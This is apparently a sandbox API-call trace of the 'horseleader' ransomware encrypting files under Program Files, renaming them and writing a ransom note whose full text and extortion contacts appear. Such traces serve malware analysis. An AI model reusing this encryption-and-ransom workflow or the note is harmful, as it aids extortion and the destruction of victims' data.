[0247.295] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.horseleader") returned 92 [0247.295] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\thmbnail.png.horseleader")) returned 1 [0247.296] GetProcessHeap () returned 0x780000 [0247.296] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.296] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x47ed, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.296] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.296] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\#Decrypt#.txt") returned 81 [0247.296] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\JOURNAL\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\journal\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.297] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.297] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.298] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.298] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.298] CloseHandle (hObject=0x158) returned 1 [0247.298] GetProcessHeap () returned 0x780000 [0247.298] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0247.299] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567e4730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="LAYERS", cAlternateFileName="")) returned 1 [0247.299] lstrcmpiW (lpString1="LAYERS", lpString2="Windows") returned -1 [0247.299] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS") returned 66 [0247.299] lstrcmpW (lpString1="LAYERS", lpString2=".") returned 1 [0247.299] lstrcmpW (lpString1="LAYERS", lpString2="..") returned 1 [0247.299] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.299] GetProcessHeap () returned 0x780000 [0247.299] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0247.299] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\*") returned 68 [0247.299] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567e4730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.301] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.301] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\.") returned 68 [0247.301] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.301] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x567e4730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.301] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.301] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\..") returned 69 [0247.301] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.301] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.301] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x954c700, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x567e4730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x954c700, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xe743, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="LAYERS.ELM", cAlternateFileName="")) returned 1 [0247.301] lstrcmpiW (lpString1="LAYERS.ELM", lpString2="Windows") returned -1 [0247.301] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.ELM") returned 77 [0247.301] StrStrIW (lpFirst="LAYERS.ELM", lpSrch=".horseleader") returned 0x0 [0247.301] lstrcmpW (lpString1="LAYERS.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.302] lstrcmpW (lpString1="LAYERS.ELM", lpString2="_uninstalling_.png") returned 1 [0247.302] lstrlenW (lpString=".testttjffg") returned 11 [0247.302] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.ELM", lpSrch=".testttjffg") returned 0x0 [0247.302] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.302] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.302] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\layers.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.303] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.ELM") returned 77 [0247.303] StrStrW (lpFirst="LAYERS.ELM", lpSrch=".txt") returned 0x0 [0247.303] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=59203) returned 1 [0247.303] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.306] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.306] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.307] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.308] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.308] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.308] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4743, lpOverlapped=0x0) returned 1 [0247.308] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb8bd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.309] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4743, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4743, lpOverlapped=0x0) returned 1 [0247.309] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.309] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.309] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.309] CloseHandle (hObject=0x1a4) returned 1 [0247.310] GetProcessHeap () returned 0x780000 [0247.310] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.310] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.ELM.horseleader") returned 89 [0247.310] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\layers.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\layers.elm.horseleader")) returned 1 [0247.311] GetProcessHeap () returned 0x780000 [0247.311] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.311] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x66247150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x215, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="LAYERS.INF", cAlternateFileName="")) returned 1 [0247.311] lstrcmpiW (lpString1="LAYERS.INF", lpString2="Windows") returned -1 [0247.311] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.INF") returned 77 [0247.312] StrStrIW (lpFirst="LAYERS.INF", lpSrch=".horseleader") returned 0x0 [0247.312] lstrcmpW (lpString1="LAYERS.INF", lpString2="#Decrypt#.txt") returned 1 [0247.312] lstrcmpW (lpString1="LAYERS.INF", lpString2="_uninstalling_.png") returned 1 [0247.312] lstrlenW (lpString=".testttjffg") returned 11 [0247.312] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.INF", lpSrch=".testttjffg") returned 0x0 [0247.312] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.312] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.312] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\layers.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.314] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.INF") returned 77 [0247.314] StrStrW (lpFirst="LAYERS.INF", lpSrch=".txt") returned 0x0 [0247.314] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=533) returned 1 [0247.314] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x215, lpOverlapped=0x0) returned 1 [0247.315] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdeb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.316] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x215, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x215, lpOverlapped=0x0) returned 1 [0247.316] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.316] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.316] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.316] CloseHandle (hObject=0x1a4) returned 1 [0247.316] GetProcessHeap () returned 0x780000 [0247.317] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.317] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.INF.horseleader") returned 89 [0247.317] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\layers.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\LAYERS.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\layers.inf.horseleader")) returned 1 [0247.321] GetProcessHeap () returned 0x780000 [0247.321] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.321] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x67b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.321] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.321] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 78 [0247.321] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.321] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.321] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.321] lstrlenW (lpString=".testttjffg") returned 11 [0247.321] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.322] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.322] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.322] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.322] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF") returned 78 [0247.322] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.323] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1659) returned 1 [0247.323] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x67b, lpOverlapped=0x0) returned 1 [0247.325] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff985, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.325] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x67b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x67b, lpOverlapped=0x0) returned 1 [0247.326] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.326] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.326] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.326] CloseHandle (hObject=0x1a4) returned 1 [0247.326] GetProcessHeap () returned 0x780000 [0247.327] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0247.327] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.horseleader") returned 90 [0247.327] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\LAYERS\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\layers\\preview.gif.horseleader")) returned 1 [0247.328] GetProcessHeap () returned 0x780000 [0247.328] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0247.328] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xaf32, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.328] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.328] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 